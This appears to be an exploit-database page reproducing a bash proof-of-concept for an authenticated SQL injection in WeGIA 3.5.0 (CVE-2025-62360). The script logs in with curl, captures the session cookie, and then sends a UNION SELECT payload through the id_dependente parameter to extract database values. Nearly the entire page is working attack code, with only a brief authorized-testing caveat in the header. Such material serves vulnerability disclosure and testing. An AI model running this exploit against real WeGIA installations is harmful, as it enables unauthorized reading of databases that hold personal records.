Share
## https://sploitus.com/exploit?id=PACKETSTORM:216511
# Exploit Title: WeGIA 3.5.0 - SQL Injection
    # Date: 2025-10-14
    # Exploit Author: Onur Demir (OnurDemir-Dev)
    # Vendor Homepage: https://www.wegia.org
    # Software Link: https://github.com/LabRedesCefetRJ/WeGIA/
    # Version: <=3.5.0
    # Tested on: Local Linux (localhost/127.0.0.1)
    # CVE : CVE-2025-62360
    # Advisory / Reference: https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mwvv-q9gh-gwxm
    # Notes: Run this script ONLY on a local/test instance you own or are authorized to test.
    # ============================================================
    
    if [ -z "$4" ]; then
    	# Usage prompt if required arguments are missing
    	echo "Usage: $0 <target-url> <user> <password> <payload>"
    	echo "Example: $0 http://127.0.0.1/WeGIA/ \"admin\" \"wegia\" \"version()\""
    	exit 1
    fi
    
    url="$1"
    user="$2"
    pass="$3"
    payload="$4"
    
    # Check if URL format is valid (basic regex)
    # This is a basic sanity check for the URL string format.
    if ! [[ "$url" =~ ^http?://[a-zA-Z0-9._-]+ ]]; then
      echo "โš ๏ธ  Invalid URL format: $url"
      exit 1
    fi
    
    # Perform login request (multipart/form)
    # -s silent, -w "%{http_code}" will append HTTP code to response
    # -D - prints response headers to stdout, combined with body in login_response
    login_response=$(curl -s -w "%{http_code}" "$url/html/login.php" \
      -D - \
      -X POST \
      -F "cpf=${user}"\
      -F "pwd=${pass}")
    
    # Extract last 3 chars as HTTP status code from the combined response
    login_status_code="${login_response: -3}"
    
    # If login did not return a 302 redirect, handle error cases
    if [ "$login_status_code" -ne 302 ]; then
    	
    	# If curl couldn't connect, curl may return 0 or empty status code
    	if [ "$login_status_code" -eq 0 ] || [ -z "$login_status_code" ]; then
    		echo "โŒ Unable to reach URL: $url"
    		exit 1
    	fi
    	
    	# Otherwise report unexpected login status
    	echo "Error: Received HTTP status code from login: $login_status_code"
    	exit 1
    fi
    
    # Extract the Location header from the login response headers
    # Using awk to find the first Location header (case-insensitive)
    login_location=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Location:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')
    
    # Check username and password correctness using Location header content
    # If the Location does not include home.php, consider login failed.
    if [[ "$login_location" != *"home.php"* ]]; then
    	
    	# If Location contains "erro" assume wrong credentials; otherwise unknown error
    	if [[ "$login_location" == *"erro"* ]]; then
    		echo "Error: Wrong username or password!"
    	else
    		echo "Error: Unknown Error!"
    	fi
    	
    	exit 1
    fi
    
    
    # Extract Set-Cookie header (first cookie) and keep only "name=value"
    # tr -d '\r' removes possible CR characters
    set_cookie=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Set-Cookie:/{print substr($0, index($0,$2)); exit}' | tr -d '\r')
    set_cookie=$(echo "$set_cookie" | cut -d';' -f1)
    
    
    #Exploit Vulnarbility
    # (The following performs the SQL injection request using the cookie obtained above)
    # The payload variable is used verbatim in the id_dependente parameter.
    # Ensure payload is provided safely in the script invocation and that you are authorized to test.
    
    # Execute the curl command and capture the output and status code
    response=$(curl -s -w "%{http_code}" "$url/html/funcionario/dependente_documento.php" -d "id_dependente=1 UNION+SELECT 'a','b',$payload;#" -b "$set_cookie;" -H "Content-Type: application/x-www-form-urlencoded")
    
    # Extract the HTTP status code (last 3 characters)
    status_code="${response: -3}"
    
    
    # Extract the body (everything except the last 3 characters)
    body="${response:0:-3}"
    
    
    # If the exploit request returned HTTP 200, try to extract id_doc
    if [ "$status_code" -eq 200 ]; then
    
    	# Prefer a robust JSON extractor if available; this line uses grep -Po to capture the id_doc value including quotes.
    	# Note: This grep returns the quoted string (e.g. "11.8.3-MariaDB-1+b1 from Debian").
    	clear_response=$(echo "$body" | grep -Po '"id_doc": *\K"[^"]*"')
    
    	# Print the extracted value (or empty if not found)
    	echo "$clear_response"
    else
    	# Non-200 status handling
    	echo "Error: Received HTTP status code $status_code"
    fi